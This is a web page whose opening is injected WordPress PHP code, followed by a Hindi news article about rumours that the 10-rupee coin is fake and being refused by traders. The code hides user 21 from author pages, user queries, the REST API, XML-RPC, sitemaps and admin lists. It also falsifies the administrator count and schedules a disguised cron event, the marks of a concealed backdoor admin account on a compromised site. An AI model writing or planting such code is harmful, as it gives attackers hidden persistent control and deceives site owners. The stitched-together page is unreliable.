add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
10 रुपए के सिक्के को लेकर उड़ी अफवाह, भिखारी भी लेने से कर रहे इंकार - Press Ki Taquat
No Result
View All Result
भारतीय रिजर्व बैंक की ओर से जारी 10 रुपए के सिक्का को नकली कहकर लेने से इंकार किया जाने लगा है। पान-बीडी, खोखे वाले, सब्जी विक्रेता, ऑटो रिक्शा चालक सहित अन्य लोग जिनमें ज्यादातर रेहड़ी-फड़ी वाले होते हैं वह 10 रुपए के सिक्के को नकली है बताकर नहीं ले रहें, जबकि इस बाबत पहले भी कई बार समाचार प्रकाशित हो चुके हैं और भारतीय रिजर्व बैंक के प्रवक्ता की ओर से भी समय-समय पर स्पष्ट किया गया है कि बाजार में प्रचलित 10 रुपए का सिक्का नकली नहीं है। बावजूद इसके इसे लेने से इंकार किया जा रहा है।
बाबू जी, कागज के नोट वाले 10 रुपए दो
जानकारी देते हुए कुछ लोगों ने बताया कि जब किसी भीख मांगने वाले को 10 रुपए का सिक्का दिया जाता है तो वह कहता है कि बाबू जी इसका हम क्या करेंगे, आप कागज के नोट वाले 10 रुपए दे दो। वहीं नगर के खुदरा बाजारों में खुले पैसों के आदान-प्रदान के समय 10 रुपए के सिक्के की पूरी तरह से अनदेखी हो रही है। जानकारी के अनुसार खुदरा बाजारों में ही कई स्थानों पर लोग 10 रुपए का सिक्का ले भी रहे हैं तथा दे भी रहे हैं।
Post Views: 201
No Result
View All Result